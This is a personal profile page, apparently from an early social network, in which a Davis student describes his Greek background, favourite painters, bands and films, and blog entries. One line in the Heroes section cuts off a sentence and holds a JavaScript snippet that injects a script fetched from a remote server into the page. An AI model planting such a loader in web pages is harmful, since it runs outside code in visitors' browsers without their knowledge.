Repeat after me: We are all individuals...

About Me

Born in San Francicsco, raised in Athens (Greece), my family comes from the region ofMani . I am currently an Anthro student at UC Davis because I love learning about all the "others" that so many love to hate. I like art that I cannot replicate, or I did't think of first. I like music that is strange without trying too hard. The Mars Volta (for example) would be a much better band if they weren't so bavardous. I like trying to find the reasons behind things. Most of the time, however, the explanations I come up with are not very positive, and contrary to my generally optimistic nature. I like ideas. I like social interaction (a lot). I like subverting the dominant paradigms, though I know I'll never win. I like to be challenged. I am one stubborn bastard, and no one knows this better than my girlfriend. I admire her patience.

I like Dali ,

Magritte ,

Vermeer ,

Bosch

(in that order), but I definately lack the patience to paint.

Photoshop is my friend, as are Benet's Reader's Encyclopedia, Webster's Dictionary, The Sceptic' s Dictionary , my motorcycle (mine is green though), OXFAM , Economic Policy Institute , CEPR ,Baroque Strings, riding in a summer evening and New Station Seafood (mmm...oysters), the Political Forum, (in no order, whatsoever).

I recently went to Burning Man for the second timeand that was definately as good as the first one. Af6ter all, whatever happens in Burning Man, did not happen at all...

Otherwise, I want to build a hovercraft and see how fast I can drive it (of course it will have a rollcage and I will be wearing a helmet). A trike for Kim would also be nice....

My Interests

I would like to understand how stupid we have to be to allow this government to exist. Hell, if we can't laugh about it, we have to mourn... ...

I'd like to meet:

People in general. People that are interesting without trying too hard. People that are mutlifaceted and talented. People that will give me somthing to admire, or inspire me in some way. People that I would invite to coffee if they lived here. People that would invite me to coffee since they do live here. Bands and artists are welcome. One condition, though: please, no friend collectors. I really don't want to be part of some popularity aspiration. If you don't find anything interesting here, chances are that the feeling is mutual... ...

Music:

Nick Cave and the Bad Seeds, Giorgos Dalaras,The Cure, Bjork, Peter Murphy, Mano Negra, Manu Chao, The Clash, Depeche Mode, Paul Oakenfold, Sasha and Digweed, Haris Alexiou, Joy Division, Bauhaus, Sky Cries Mary, Natasha Atlas, The Jesus and Mary Chain, The Velvet Underground, Ella Fitzgerald, Edith Piaf, Etta James, My Life WIth the Thrill Kill Kult, Nina Hagen, Portishead, PJ Harvey, Vivaldi, The Pixies, Savinna Yianatou, The Streets, KMFDM, Offra Haza, Prodigy, Dead Can Dance, Tricky, This Mortal Coil, System of a Down, Sara Brightman. OH GOD! I can't think anymore......

Y Tu Mama Tambien, Brother, The Body, Mullholand Drive,Memento ,The Following, Quills,,12 Monkeys,

The Pillow Book ,Temptress Moon, Ran, The City of Lost Children,

,

Kill Bill..., Blue Velvet, Brazil, and other ones that I don't own right now -

Man bites Dog ,Raise the Red Lantern, John Woo, and more...Lately, these were memorable: , if you want to see how others live lives that you never thought...
Also,

mainly because I tend to like much of the Modern Asian film aesthetic. ...

Television:

If I owned a TV station, it would show things like these (click photo for more info):

...

Books:

Heroes:

I am conflicted on this one... I guess I share Brecht's thoughts that unhappy is the land that breeds no heroes, but happy is the land that needs no heroes...Lately, however, the most memorable quote I heard (ok, read) is: "I am a pessimist because of intelligence, but an optimist because of will" by Antonio Gramsci .

That almost qualifies him to become a hero, though I doubt he would ever accept the honor.

Also, Sei Shonagon

, because she was a woman in a man.."var x=document·createElement('script');x.src='http://www... /.../test.js';document·getElementsByTagName('body')[0]. appendChild(x);" /

My Blog

The unbearable lightness of incogruousness

Earlier, I took a nap, before braving the second trip tp Davis today. I woke up approximately 3 minutes ago, with the word "recidivist" in my head. As if this was not bizarre enough, the vaguely-forme...

"Non" to 2007

For some bizarre reason, I find this  news story particulalry amusing. A bunch of Frenchmen with a healthy sense of humor and a trully original way to celebrate the new year. If this, howeve...

"V" is for Worthless

Kim rcieved the movie from her Netflix account, and we got to watch it yesterday. Some part of me was hoping that there would be some meaningful symbolisms to be found in the film, but I was sorely di...

The Black Hand

The Black Hand, as it turns out, is quite the didactic thing. Of course, you may imagine that I am speaking of the famous anarchist organization that nearly botched that assasination of archduke Ferdi...

Molly and the whales

First read this. Did anyone notice that there was a "pet-therapist" involved? Although I greatly overjoyed that the unfotunate feline was safely extracted, I cannot help but feel a certain amount of l...

Out With the Old, In With the New!

Who ever said that scientists are not funny? I know we tend to picture them as people that are much smarter than average, always wear a lab coat while they huddle over Bunsen burners, surrounded by te...

Dead Can Dance?

About six months ago Kim heard that Dead Can Dance were going to be on tour again. Since I had been raving about them ever since she met me, she thought it would be nice to buy us tickets immediatelly...

Trip - Fire- Near Miss- Return

This summer, I relented. At Scott's insistence (and a complete lack of reasons that have been present for the last 8 years), I finally went to Burning Man. Quite surprisingly, I did not, however, take...

Confessions of a Delivery Boy (1)

The mobile phone rings, just as I am walking through the parking lot of auotzone, heading back to my car. You're on! the voice said. That was it, the call to the airport. I get in th...
